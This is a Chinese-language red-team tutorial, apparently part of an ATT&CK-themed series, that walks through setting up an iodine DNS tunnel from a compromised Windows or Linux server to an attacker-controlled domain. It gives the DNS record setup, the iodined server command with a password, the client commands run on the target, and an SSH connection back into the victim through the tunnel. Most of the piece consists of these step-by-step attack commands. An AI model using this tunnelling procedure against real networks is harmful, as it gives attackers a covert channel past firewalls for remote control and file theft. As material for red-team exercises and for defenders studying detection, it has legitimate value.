一.前言
DNS隧道(DNS Tunneling)也是隐蔽隧道的一种方式,通过将其他协议封装在DNS协议中传输建立通信。大部分防火墙和入侵检测设备很少会过滤DNS流量,这就给DNS隧道提供了条件,可以利用它实现诸如远程控制、文件传输的操作。使用dns搭建隧道的工具也有很多,比如dnscat2、DNS2tcp、iodine等。由于iodine工具使用比较稳定,这里使用iodine进行演示,它可以通过一台dns服务器制作一个Ipv4通道,iodine分为客户端和服务端,Iodine不仅有强制密码措施,还支持多种DNS记录类型,而且支持16个并发连接,因此很多时候Iodine是DNS隧道的第一选择。
二.前文推荐
ATT&CK视角下的红蓝对抗:一. 隧道穿透技术详解
ATT&CK视角下的红蓝对抗:二. 内网探测协议出网
ATT&CK视角下的红蓝对抗:三. 内网常规隧道利用方法
ATT&CK视角下的红蓝对抗:四. 内网穿透之通过Earthworm(EW)进行隧道穿透
ATT&CK视角下的红蓝对抗:五. 内网穿透之利用HTTP协议进行隧道穿透
ATT&CK视角下的红蓝对抗:六.内网穿透之利用FRP进行隧道穿透
ATT&CK视角下的红蓝对抗:七.内网穿透之利用Venom进行隧道穿透
ATT&CK视角下的红蓝对抗:八.内网穿透之利用Termite进行隧道穿透
ATT&CK视角下的红蓝对抗:九.内网穿透之利用GRE协议进行隧道穿透
ATT&CK视角下的红蓝对抗:十.内网穿透之利用DNS协议进行隧道穿透
三.利用DNS协议进行隧道穿透
假设在内网渗透中探测目标服务器,并且我们已经获取到目标服务器主机控制权限,探测DNS协议开放,可以尝试利用DNS隧道工具后续搭建隧道,这里以Iodine工具为案例进行演示,本次实验拓扑如图1-1所示。
图1-1 DNS协议实验拓扑图
1.环境配置
1)使用Iodine工具搭建隧道的前提是有一台服务器和域名,首先进行配置域名解析,为攻击者服务器域名配置两条解析,域名解析配置如图1-2所示,其中A记录类型是告诉dns服务器,域名ns1.xxx.net.cn是由攻击者服务器的公网IP解析,而NS记录类型是告诉dns服务器,域名dc.xxx.net.cn是由dns.ns1.xxx.net.cn解析。
图1-2域名配置
2)如果解析不成功会导致后续DNS隧道无法进行,接下来,我们使用ping命令检测当前环境配置,这里发现可以ping通ns1.xxx.net.cn,说明A记录配置正确,如图1-3所示。
图1-3 ping命令测试配置
3)在攻击者服务器执行tcpdump -n -i eth0 udp dst port 53命令监听本地UDP的53端口。在任意一台主机上执行nslookup dc.xxx.net.cn命令访问域名,如果攻击者服务器监听的端口有查询信息,证明NS记录设置成功,如图1-4所示。
图1-4域名解析配置测试
4)在攻击者服务器进行部署iodine工具,执行yum -y install iodine命令来进行安装,安装完毕后通过执行iodine -v查看版本,如图1-5所示。
图1-5 安装环境
5)下面启动iodine服务端,执行iodined -f -c -P root@Admin123. 192.168.10.1 dc.xxxx.net.cn -DD命令,配置生成虚拟网段,其中-f参数是在前台运行,-c参数禁止检查所有传入请求的客户端IP地址,-P参数指客户端和服务端之间用于验证身份的密码,可以自定义,-D参数指定调试级别,-DD指第二级,"D"的数量随级别增加,这里的IP 192.168.10.1为自定义的虚拟网段,下面实验会通过这个虚拟网段连接服务端,注意网段不要与已存在网段相同,否则会发生冲突连接失败。执行成功则如图1-6所示。
图1-6启动iodine服务端
6)服务端配置成功后会多出一个我们自定义的网卡段,它用来与客户端进行通讯。我们新建一个会话,使用ifconfig命令查看服务器,会发现多出一个虚拟网卡地址,地址为刚设置的地址,如图1-7所示,证明服务端配置成功。
图1-7 网卡配置信息
7)我们也可以通过iodine检查页面https://code.kryo.se/iodine/check-it/来检查配置是否正确,输入dc.xxx.net.cn检测,若结果如图1-8所示,则表示设置成功。
图1-8 通过iodine检查页面验证配置成功
2.Windows系统下进行DNS隧道穿透利用
1)下面我们来进行DNS隧道里,假设目标服务器是windows系统,可以使用iodine.exe工具,使用前需要TAP适配器,下载地址为https://swupdate.openvpn.org/community/releases/openvpn-install-2.4.8-I602-Win10.exe,下载后直接在目标服务器安装,如图1-9所示。
图1-9 安装TAP适配器
2)在目标服务器执行iodine.exe -f -r -P root@Admin123. dc.xxx.net.cn命令,如果出现提示Connection setup complete, transmitting data,就表示DNS隧道已经建立,如图1-10所示。
图1-10客户端连接服务端
3)此时目标服务器会多出一条虚拟网卡,这个网卡就是我们执行后建立的通讯网卡,查看其IP为192.168.10.2,与上述DNS自定义网卡一致,证明搭建隧道成功,如图1-11所示。
图1-11 网卡IP信息
3.Linux系统下进行DNS隧道穿透利用
假设目标服务器是Linux系统,我们执行操作同上述Windows操作一样,在目标服务器下载Iodine工具后,执行iodine -f -r -P root@Admin123. dc.xxx.net.cn命令,连接攻击者服务器,如图1-12所示。
图1-12连接Linux服务器
此时DNS隧道已经搭建成功,执行ifconfig命令后,得知IP是192.168.10.2,我们可以尝试用攻击者服务器进行对客户端192.168.10.2进行ssh连接,连接成功如图1-13所示。
图1-13服务端进行对客户端ssh连接
四.本篇总结
随着隧道技术的不断更新迭代,越来越多的攻击者利用隧道技术攻击企业内网,通过本篇文章从内网穿透之利用DNS协议进行隧道穿透的方式,并且通过大量的案例来演示了多个实际常见的隧道场景,希望本篇内容对读者有所帮助。
我正在参与2023腾讯技术创作特训营第三期有奖征文,组队打卡瓜分大奖!